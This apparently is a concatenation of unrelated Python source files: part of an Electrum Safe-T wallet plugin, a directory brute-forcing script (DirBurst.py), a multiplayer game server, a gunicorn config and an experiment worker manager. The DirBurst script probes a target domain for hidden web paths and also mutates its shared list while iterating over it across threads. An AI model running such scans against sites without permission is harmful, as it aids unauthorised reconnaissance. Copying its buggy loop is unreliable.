raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_safet_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_safet_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
DirBurst.py
|
#!/usr/bin/env python3
import requests
import threading
import time
start = time.perf_counter()
class DirBust():
def get_domain(self): # function to prompt user for target domain.
print("[+] Enter the target domain. ")
self.target = input("[+] ")
return self.target
def get_wordlist(self): # get directory brute list from file.
file = open("wordlist.txt")
self.content = file.read()
self.directory_list = self.content.splitlines() #split in lines to brute one by one.
return self.directory_list
def __init__(self):
self.discovered_directory_paths = [] # list of discovered directory paths.
self.directory_paths = self.get_wordlist()
self.domain = self.get_domain()
self.threads = []
self.thread_count = self.get_threads()
def find_directory_paths(self):
for directory_path in self.directory_paths: # iterating over each directory path in directory_path list
path = f"https://{self.domain}/{directory_path}"
self.directory_paths.pop(0)
print("[+] Trying path : ", path)
try:
status = requests.get(path) # send get request to check if the path exists.
except requests.ConnectionError: # if does not exist.
pass # do nothing
else:
if (status.status_code == 404):
pass
else:
print("[+] Discovered URL : ", path)
self.discovered_directory_paths.append(path) #append to list.
def save_to_file(self): # function to save output list to file.
with open("Discovered_Directory_paths.txt", "w") as outfile:
for disovered_path in self.discovered_directory_paths:
outfile.write(disovered_path + "\n")
outfile.close()
def get_threads(self):
print("[+] How many threads you want to use? ")
self.thread_count = int(input("[+] "))
if (self.thread_count <= 0 or self.thread_count > 200):
print("[+] Please Enter threads in the range of 1 to 200.")
exit()
else:
return self.thread_count
def run_threads(self):
for _ in range(self.thread_count):
t = threading.Thread(target = self.find_directory_paths)
t.start()
self.threads.append(t)
for thread in self.threads:
thread.join()
if __name__ == "__main__":
try:
DB = DirBust()
DB.run_threads()
DB.save_to_file()
except KeyboardInterrupt: #exit if keyboard interrupted.
print("\n[-] Keyboard interrupt Triggered. ")
finish = time.perf_counter()
print(f"[+] Finished in {round(finish-start, 2)} seconds. ")
|
server.py
|
import socket #for client connections
import select
import sys
import time
import math
import random
import struct
import threading
import os
from collections import deque as deque
import obj
import placement
from placement import Placement
from placement import Quat
import waitFramerate
import assetManifest
from hypercubeCollide import hypercol
framerate = 30.0
con_vel = 3.0/framerate #it takes a third of a second for binary input players to go from neutral to maximum control
collisionRules = [
[0, 1, 0, 0],#rings
[1, 1, 1, 1],#ships
[0, 1, 0, 1],#asteroids
#[0, 1, 1, 1],
[0, 1, 1, 0]#missiles
]
cliInputs = deque()
collide = None
manifest = None
for ridx in range(len(collisionRules)):
r = collisionRules[ridx]
if len(r) != len(collisionRules):
print("Improper collision rules! Invalid row lengths")
for cidx in range(len(r)):
if r[cidx] != collisionRules[cidx][ridx]:
print("Improper collision rules! Not symmetric matrix")
class CliInput:
def __init__(self, cliId, msg):
self.id = cliId
self.msg = msg
def init():
global cliInputs, collide, manifest
#load model manifest
manifest = assetManifest.readManifest("assets/manifest3.json")
if manifest == None:
return
#start client listener
startNetworking()
#create collider object
collide = hypercol.Hypercol(3)#request a 3D collider
print("Process:",os.getpid())
for x in manifest["models"]:
collide.loadOClass(x['name'], "assets/nhc3/"+x['name']+".nhc3")
while True:
print("Starting new round")
setupNewRound()
roundResults = roundLoop()
print(roundResults)
time.sleep(1)#inter-round delay
collide = None
def setupNewRound():
Client.dieAll()
CommandPoint.removeAll()
Missile.removeAll()
obj.removeAll()
Team.clear()
Team("CYAN", (0.0, 1.0, 0.941, 1.0))
Team("MGTA", (1.0, 0.0, 0.941, 1.0))
for c in random.sample(list(Client.clients), len(Client.clients)):
c.team = Team.select()
for idx in range(10):
CommandPoint()
for idx in range(100):
asteroid = obj.OctObj(random.choice((3, 4, 6)), 2)
asteroid.pos.randomize(60000)
#Team("Yellow", (1.0, 0.941, 0))
def roundLoop():
global manifest, collide, framerate, clientLock
start = time.monotonic()
winner = None
#test_iterations = 100
test_iterations = -1
framecounter = 0
while (not winner) and test_iterations != 0:
framecounter = (framecounter+1)%framerate
#operations to do once per second
if framecounter == 0:
for c in Client.clients:
c.ping()
if test_iterations > 0:
test_iterations -= 1
clientLock.release()
if not test_iterations >= 0:
waitFramerate.waitFramerate(1/framerate)
clientLock.acquire()
#Handle client inputs
for hIdx in range(len(cliInputs)):
handleClientInput(cliInputs.pop())
#Find Collisions
myscene = collide.newScene(collisionRules)
collide.selectScene(myscene)
bscollidedict = dict()#FIXME
bscollideind = 0
for o in obj.objects.values():
if isinstance(o, obj.OctObj):
convcoord = [int(o.pos.loc[idx]/manifest['resolution']*2.0) for idx in range(3)]
pt = collide.createPoint(convcoord)
orient = collide.createOrientation(*o.pos.rot)
oinst = collide.newOInstance_o(o.collisionClass, pt, orient, manifest['models'][o.mid]['name'])
collide.addInstance(oinst)
bscollidedict[bscollideind] = o
bscollideind+=1
elif isinstance(o, obj.LineObj):
vec = o.offset[:]
placement.normalize(vec)
start = collide.createPoint([int((o.loc[idx] + vec[idx] * o.movement)/manifest['resolution']*2.0) for idx in range(3)])
offset = collide.createPoint([int(o.offset[idx]/manifest['resolution']*2.0) for idx in range(3)])
oinst = collide.newOInstance_l(o.collisionClass, start, offset)
collide.addInstance(oinst)
bscollidedict[bscollideind] = o
bscollideind+=1
else:
pass
#assert isinstance(o, obj.SphereObj)
collide.calculateScene()
c = collide.getCollisions()
collide.freeScene(myscene)
for o in obj.objects.values():
o.collisions.clear()
#if c[0] != 0:
# print("Got",c[0],"collisions")
for cIdx in range(c[0]):#first array element is the number of collisions
o1 = bscollidedict[c[1+2*cIdx]]
o2 = bscollidedict[c[2+2*cIdx]]
o1.collisions.add(o2)
o2.collisions.add(o1)
#Step Physics
commandObjKeys = CommandPoint.commandobjects.keys()
for m in Missile.missiles:
for col in m.obj.collisions:
if col.solid:
m.die()
break
m.step()
for c in Client.clients:
if c.obj == None:
continue
for col in c.obj.collisions:
if col.solid:
Client.chat(c.name+" died")
c.respawn(0)
if c.team != None:
c.team.award(-1000)
if col in commandObjKeys:
CommandPoint.commandobjects[col].capture(c.team)
for c in Client.clients:
if c.obj == None:
c.respawn(0)
c.applyControls()
Missile.cleanDead()
#Add commandpoint score
for t in Team.teams:
t.award(len(t.commandPoints))
if t.points > 10000:
winner = t
break
#Send Client Data
deadClients = set()
for c in Client.clients:
c.sendUpdate()
if c.dead:
deadClients.add(c)
for dc in deadClients:
print("Removing dead client")
dc.remove()
#sys.exit("exiting")
#end = time.monotonic()
#print(str(end-start))
Client.chat("Team "+t.name+" Wins!")
def handleClientInput(i):
comm = i.msg[0:4]
rest = i.msg[4:]
cli = clientsById[i.id]
if comm == b'CTRL':
cli.control = int(rest, 16)
#print(str(i.id)+" controls: "+str(cli.control))
elif comm == b'ORNT':
cli.targetOrientation = Quat.netunpack(rest)
elif comm == b'COMM':
if len(rest) >= 1:
if rest[0] == ord('/'):
cli.runcommand(rest.decode('UTF-8').split())
else:
Client.chat(cli.name+": "+rest.decode('UTF-8'))
elif comm == b'RDEF':
uid = struct.unpack('!i', i.msg[4:])[0]
if uid in obj.objects.keys():
targ = obj.objects[uid]
cli.sendDef(targ)
else:
print("ignoring request for", uid)
else:
print("Unknown message from "+str(i.id)+": "+str(i.msg))
#Client stuff
cliNetThread = None
def startNetworking():
global cliNetThread, clientLock
clientLock.acquire()
cliSock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
cliSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
cliSock.bind(("", 3131))
cliSock.listen()
cliNetThread = threading.Thread(group=None, target=cliNetThreadLoop, name="cliNetThread", args=(cliSock,))
cliNetThread.start()
class Team:
teams = []
netPackCache = None
def select():
if len(Team.teams) < 1:
return None
weakestTeam = Team.teams[0]
for t in Team.teams:
if t.members() < weakestTeam.members():
weakestTeam = t
return weakestTeam
def clear():
for x in Client.clients:
x.team = None
Team.teams = []
Team.netPackCache = None
print("Cleared Teams")
def scoreboard():
board = dict()
for t in Team.teams:
board[t.name] = t.points
return board
def getByName(n):
for t in Team.teams:
if t.name == n:
return t
return None
def netPack():
if not Team.netPackCache:
Team.netPackCache = struct.pack('!b', len(Team.teams))
for t in Team.teams:
Team.netPackCache += struct.pack('!i', t.points)
return Team.netPackCache
def __init__(self, name, color):
name = name.upper()
#team names ending in underscore are individual user teams for ffa
if Team.getByName(name):
uniqueSuffix = 2
while Team.getByName(name+"_"+str(uniqueSuffix)):
uniqueSuffix += 1
name = name+"_"+str(uniqueSuffix)
self.name = name
self.color = color
self.points = 0
self.commandPoints = set()
Team.teams.append(self)
def members(self):
ret = 0
for x in Client.clients:
if x.team == self:
ret+=1
return ret
def award(self, pts):
self.points += pts
Team.netPackCache = None
class Missile:
missiles = set()
deadMissiles = set()
def cleanDead():
for dm in Missile.deadMissiles:
dm.remove()
Missile.deadMissiles = set()
def __init__(self, originObj):
self.obj = obj.LineObj(3)
tempplacement = Placement()
tempplacement.copy(originObj.pos)
tempplacement.moveForward(0.75*manifest['models'][originObj.mid]['diameter'])
self.obj.loc = tempplacement.loc
diameter = manifest['models'][5]['diameter']
self.obj.offset = [int(x*diameter) for x in tempplacement.rot.forward()]
self.lifetime = int(3*framerate)
self.speed = int(manifest['models'][5]['speed']/framerate)
Missile.missiles.add(self)
def die(self):
Missile.deadMissiles.add(self)
def remove(self):
Missile.missiles.remove(self)
self.obj.remove()
def step(self):
self.lifetime -= 1
if self.lifetime <= 0:
self.die()
self.obj.movement += self.speed
def removeAll():
Missile.missiles = set()
Missile.deadMissiles = set()
class CommandPoint:
commandobjects = dict()
def __init__(self, objMid = 2, totemMid = 1, team=None):
totemColor = (0.9, 0.9, 0.9, 1.0)
self.team = team
if team != None:
totemColor = team.color
#The obj is the capture box. The totem is an optional auxillary solid marker
self.obj = obj.OctObj(objMid, 0, color=(0.5, 0.75, 1.0, 0.5), solid=False)
self.totem = obj.OctObj(totemMid, 0, color=totemColor, solid=True)
self.obj.pos.randomize(20000)
self.totem.pos = self.obj.pos
CommandPoint.commandobjects[self.obj] = self
def capture(self, team):
if self.team == team:
return
if self.team != None:
self.team.commandPoints.remove(self)
self.team = team
if self.team != None:
self.team.commandPoints.add(self)
self.totem.setColor(team.color)
def setLocation(self, p):
self.obj.pos.moveAbs(p)
self.totem.pos.moveAbs(p)
def removeAll():
CommandPoint.commandobjects = dict()
newCliId = 1
class Client:
clients = set()
def chat(msg):
for c in Client.clients:
c.sendmsg("CONS"+msg)
def __init__(self, soc):
global newCliId
self.soc = soc
self.id = newCliId
newCliId += 1
self.buf = bytes()
self.obj = None
self.control = 0
self.pitch = 0.0
self.yaw = 0.0
self.roll = 0.0
self.targetOrientation = Quat()
self.throttle = 0.0
self.dead = False
self.name = "client_"+str(self.id)
self.team = None
self.pingtime = 999 #ms
self.pingsenttime = None
self.setTeam(Team.select())
Client.clients.add(self)
def runcommand(self, tok):
print(self.name+' executing: '+' '.join(tok))
try:
for tidx in range(len(tok)):
tok[tidx] = tok[tidx].upper()
if tok[0] == '/NAME':
if(len(tok) < 2):
self.sendmsg('CONSBad /NAME usage.\nTry /HELP')
else:
self.name = tok[1]
self.obj.setName(self.name)
self.sendmsg('CONSName set: '+self.name)
elif tok[0] == '/LIST':
msg = "CONS"
for c in Client.clients:
msg += c.name+':'+c.team.name+","
self.sendmsg(msg)
elif tok[0] == '/HELP':
self.sendmsg("CONS/NAME <yourname>\n/LIST\n/TEAM [TEAMNAME]")
elif tok[0] == '/TEAM':
print("Token len:", len(tok))
if(len(tok) < 2):
if(self.team):
self.sendmsg("CONS"+self.team.name)
else:
teamname = tok[1]
myNewTeam = Team.getByName(teamname)
if(myNewTeam):
self.setTeam(myNewTeam)
self.sendmsg('CONSTeam set: '+self.team.name)
else:
self.sendmsg('CONSTeam not found.')
else:
self.sendmsg("CONSUnknown command: "+tok[0]+"\nTry /HELP")
except:
print("Caught otherwise unhandled client command exception \"",tok,"\"")
def respawn(self, modelId):
self.die()
color = (0.7, 0.5, 0.5)
if self.team != None:
color = self.team.color
self.obj = obj.OctObj(0, 1, color = color, name = self.name)
self.obj.pos.randomize(20000)
self.sendAsg()
def die(self):
if self.obj == None:
return
o = self.obj
self.obj = None
o.remove()
def dieAll():
for c in Client.clients:
c.die()
def append(self, data):
self.buf = self.buf+data
foundSomething = True
while foundSomething:
foundSomething = False
remainingLen = len(self.buf)
if(remainingLen < 4):
break
nextMsgLen = struct.unpack('!i', self.buf[:4])[0]
if remainingLen-4 >= nextMsgLen:
foundSomething = True
msg = self.buf[4:nextMsgLen+4]
if msg == b'PING':
self.pinghandle()
elif msg == b'PONG':
self.ponghandle()
else:
cliInputs.appendleft(CliInput(self.id, msg))
self.buf = self.buf[nextMsgLen+4:]
def setTeam(self, team):
if(self.team == team):
return
self.team = team
if(self.obj):
self.obj.setColor(team.color)
self.die()
def sendAsg(self):
if(self.obj):
self.send(b"ASGN" + struct.pack('!ih', self.obj.uid, int(manifest['models'][self.obj.mid]['turn']*100.0)))
def sendDef(self, o):
self.send(b"ODEF" + o.netDef())
def sendUpdate(self):
fMsg = [b"FRME", Team.netPack()]
octobj = list()
lineobj = list()
for o in obj.objects.values():
if isinstance(o, obj.OctObj):
octobj.append(o.netPack())
else:
assert isinstance(o, obj.LineObj)
lineobj.append(o.netPack())
fMsg.append(struct.pack('!i', len(octobj)))
fMsg += octobj
fMsg.append(struct.pack('!i', len(lineobj)))
fMsg += lineobj
self.send(b''.join(fMsg))
def sendmsg(self, msg):
self.send(msg.encode("UTF-8"))
def send(self, data):
try:
self.soc.sendall(len(data).to_bytes(4, byteorder='big')+data)
except Exception as e:
print("Socket failed to write")
self.ts_remove()
def ping(self):
self.send(b'PING')
self.pingsenttime = time.time()
def pinghandle(self):
self.send(b'PONG')
def ponghandle(self):
if self.pingsenttime:
self.pingtime = int(1000 * (time.time()-self.pingsenttime))
self.pingsenttime = None
def controlRange(targetValue, currentValue):
delta = targetValue-currentValue
return currentValue + max(-con_vel, min(con_vel, delta))
#return targetValue
def applyControls(self):
global framerate
if self.obj == None:
return
c = self.control
self.yaw = Client.controlRange(((c>>1)&1)-((c>>2)&1), self.yaw)
self.pitch = Client.controlRange(((c>>4)&1)-((c>>3)&1), self.pitch)
self.roll = Client.controlRange(((c>>7)&1)-((c>>5)&1), self.roll)
self.throttle = Client.controlRange(((c>>8)&1)-((c>>6)&1), self.throttle)
#print(str(self.throttle)+' '+str(self.yaw)+' '+str(self.pitch)+' '+str(self.roll))
posObj = self.obj.pos
maniModel = manifest['models'][self.obj.mid]
speed = maniModel['speed']/framerate
trange = maniModel['trange']#throttle position range information
if self.obj:
self.obj.pos.rot = Quat.slerp(self.obj.pos.rot, self.targetOrientation, t = 0.5, maxangle=manifest['models'][self.obj.mid]['turn']/framerate)
realthrottle = self.throttle
if self.throttle >= 0 :
realthrottle = trange[1]+(self.throttle*(trange[2]-trange[1]))
else:
realthrottle = trange[1]-(self.throttle*(trange[0]-trange[1]))
posObj.moveForward(realthrottle*speed)
if c & 1:#Missile
self.control &= ~1
Missile(self.obj)
def ts_remove(self):#thread-safe
self.dead = True
def remove(self):
self.die()
del clientsById[self.id]
del clientsBySoc[self.soc]
Client.clients.remove(self)
clientsBySoc = dict()
clientsById = dict()
selSocks = []
clientLock = threading.Lock()
def cliNetThreadLoop(soc):
global clientsBySoc, clientsById, selSocks, clientLock
selSocks.append(soc)
while True:
readable = select.select(selSocks,[],[])[0]
for r in readable:
if r is soc:
newCliSoc = r.accept()[0]
selSocks.append(newCliSoc)
print("trying to acquire lock")
clientLock.acquire()
newCli = Client(newCliSoc)
clientsBySoc[newCliSoc] = newCli
clientsById[newCli.id] = newCli
clientLock.release()
print("New Client: "+str(newCli.id)+" ("+str(len(selSocks))+" total)")
else:
c = clientsBySoc[r]
msg = b''
try:
msg = r.recv(4096);
except Exception as e:
print("Failed to read from client: "+str(c.id))
if len(msg) == 0:
print("Got Client disconnect: "+str(c.id))
selSocks.remove(r)
c.ts_remove()
else:
c.append(msg)
init()
|
gunicorn_conf.py
|
# Copyright 2019-2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Config file for gunicorn."""
import os
import time
import signal
import sys
import multiprocessing
import threading
from importlib import import_module
import psutil
import gunicorn
from mindinsight.utils.computing_resource_mgr import terminate
from mindinsight.debugger.session_manager import SessionManager
gunicorn.SERVER_SOFTWARE = 'unknown'
worker_class = 'sync'
workers = 1
threads = min(30, os.cpu_count() * 2 + 1)
worker_connections = 1000
timeout = 30
graceful_timeout = 30
daemon = False
captureoutput = False
# write gunicorn default log to devnull, and using mindinsight logger write gunicorn log to file.
accesslog = os.devnull
def on_starting(server):
"""Hook function on starting gunicorn process."""
hook_module = import_module('mindinsight.utils.hook')
for hook in hook_module.HookUtils.instance().hooks():
threading.Thread(target=hook.on_startup, args=(server.log,)).start()
# This global variable is to manage the listen process so that we can close the
# process when gunicorn is exiting.
LISTEN_PROCESS = None
def post_worker_init(worker):
"""
Launch a process to listen worker after gunicorn worker is initialized.
Children processes of gunicorn worker should be killed when worker has been killed
because gunicorn master murders this worker for some reasons such as worker timeout.
Args:
worker (ThreadWorker): worker instance.
"""
def murder_worker_children_processes():
signal.signal(
signal.SIGTERM,
lambda signal_num, handler: sys.exit(0))
processes_to_kill = []
# sleep 3 seconds so that all worker children processes have been launched.
time.sleep(3)
process = psutil.Process(worker.pid)
for child in process.children(recursive=True):
if child.pid != os.getpid():
processes_to_kill.append(child)
while True:
if os.getppid() != worker.pid:
# Kill the remaining sub-processed after the worker process died
_, alive = psutil.wait_procs(processes_to_kill, 0.1)
current_worker_pid = os.getppid()
for proc in alive:
worker.log.info("Original worker pid: %d, current worker pid: %d, stop process %d",
worker.pid, current_worker_pid, proc.pid)
try:
proc.send_signal(signal.SIGKILL)
except psutil.NoSuchProcess:
continue
except psutil.Error as ex:
worker.log.error("Stop process %d failed. Detail: %s.", proc.pid, str(ex))
worker.log.info("%d processes have been terminated by listener.", len(alive))
break
time.sleep(1)
listen_process = multiprocessing.Process(target=murder_worker_children_processes,
name="murder_worker_children_processes")
listen_process.start()
global LISTEN_PROCESS
LISTEN_PROCESS = listen_process
worker.log.info("Service start state: success.")
worker.log.info("Server pid: %d, start to listening.", worker.ppid)
def worker_int(worker):
"""Terminate child processes when worker is interrupted."""
terminate()
global LISTEN_PROCESS
if LISTEN_PROCESS is not None:
LISTEN_PROCESS.terminate()
SessionManager.get_instance().exit()
worker.log.info("Worker int processed.")
|
worker_manager.py
|
"""
A manager for multiple workers.
-- kandasamy@cs.cmu.edu
"""
from __future__ import print_function
from __future__ import division
# pylint: disable=invalid-name
# pylint: disable=abstract-class-not-used
# pylint: disable=abstract-class-little-used
from argparse import Namespace
from multiprocessing import Process
import numpy as np
import os
import shutil
import time
try:
from sets import Set
except ImportError:
Set = set
# Local
from exd.exd_utils import EVAL_ERROR_CODE
_TIME_TOL = 1e-5
class WorkerManager(object):
""" A Base class for a worker manager. """
def __init__(self, worker_ids):
""" Constructor. """
if hasattr(worker_ids, '__iter__'):
self.worker_ids = worker_ids
else:
self.worker_ids = list(range(worker_ids))
self.num_workers = len(self.worker_ids)
# These will be set in reset
self.experiment_designer = None
self.latest_results = None
# Reset
self.reset()
def reset(self):
""" Resets everything. """
self.experiment_designer = None
self.latest_results = [] # A list of namespaces
self._child_reset()
def _child_reset(self):
""" Child reset. """
raise NotImplementedError('Implement in a child class.')
def fetch_latest_results(self):
""" Returns the latest results. """
ret_idxs = []
for i in range(len(self.latest_results)):
if (self.latest_results[i].receive_time <=
self.experiment_designer.get_curr_spent_capital() + _TIME_TOL):
ret_idxs.append(i)
keep_idxs = [i for i in range(len(self.latest_results)) if i not in ret_idxs]
ret = [self.latest_results[i] for i in ret_idxs]
self.latest_results = [self.latest_results[i] for i in keep_idxs]
return ret
def close_all_queries(self):
""" Closes all queries. """
raise NotImplementedError('Implement in a child class.')
def set_experiment_designer(self, experiment_designer):
""" Set the experiment designer. """
self.experiment_designer = experiment_designer
def a_worker_is_free(self):
""" Returns true if a worker is free. """
raise NotImplementedError('Implement in a child class.')
def all_workers_are_free(self):
""" Returns true if all workers are free. """
raise NotImplementedError('Implement in a child class.')
def _dispatch_experiment(self, func_caller, qinfo, **kwargs):
""" Dispatches job. """
raise NotImplementedError('Implement in a child class.')
def dispatch_single_experiment(self, func_caller, qinfo, **kwargs):
""" Dispatches job. """
raise NotImplementedError('Implement in a child class.')
def dispatch_batch_of_experiments(self, func_caller, qinfos, **kwargs):
""" Dispatches an entire batch of experiments. """
raise NotImplementedError('Implement in a child class.')
def get_time_distro_info(self):
""" Returns information on the time distribution. """
#pylint: disable=no-self-use
return ''
def get_poll_time_real(self):
""" Returns the poll time. """
raise NotImplementedError('Implement in a child class.')
# A synthetic worker manager - for simulating multiple workers ---------------------------
class SyntheticWorkerManager(WorkerManager):
""" A Worker manager for synthetic functions. Mostly to be used in simulations. """
def __init__(self, num_workers, time_distro='const', time_distro_params=None):
""" Constructor. """
self.worker_pipe = None
super(SyntheticWorkerManager, self).__init__(num_workers)
# Set up the time sampler
self.time_distro = time_distro
self.time_distro_params = time_distro_params
self.time_sampler = None
self._set_up_time_sampler()
def _set_up_time_sampler(self):
""" Set up the sampler for the time random variable. """
self.time_distro_params = Namespace() if self.time_distro_params is None else \
self.time_distro_params
if self.time_distro == 'caller_eval_cost':
pass
elif self.time_distro == 'const':
if not hasattr(self.time_distro_params, 'const_val'):
self.time_distro_params.const_val = 1
self.time_sampler = lambda num_samples: (np.ones((num_samples,)) *
self.time_distro_params.const_val)
elif self.time_distro == 'uniform':
if not hasattr(self.time_distro_params, 'ub'):
self.time_distro_params.ub = 2.0
self.time_distro_params.lb = 0.0
ub = self.time_distro_params.ub
lb = self.time_distro_params.lb
self.time_sampler = lambda num_samples: (np.random.random((num_samples,)) *
(ub - lb) + lb)
elif self.time_distro == 'halfnormal':
if not hasattr(self.time_distro_params, 'ub'):
self.time_distro_params.sigma = np.sqrt(np.pi/2)
self.time_sampler = lambda num_samples: np.abs(np.random.normal(
scale=self.time_distro_params.sigma, size=(num_samples,)))
else:
raise NotImplementedError('Not implemented time_distro = %s yet.'%(
self.time_distro))
def _child_reset(self):
""" Child reset. """
self.worker_pipe = [[wid, 0.0] for wid in self.worker_ids]
def sort_worker_pipe(self):
""" Sorts worker pipe by finish time. """
self.worker_pipe.sort(key=lambda x: x[-1])
def a_worker_is_free(self):
""" Returns true if a worker is free. """
return self.worker_pipe[0][-1] # Always return true as this is synthetic.
def all_workers_are_free(self):
""" Returns true if all workers are free. """
return self.worker_pipe[-1][-1]
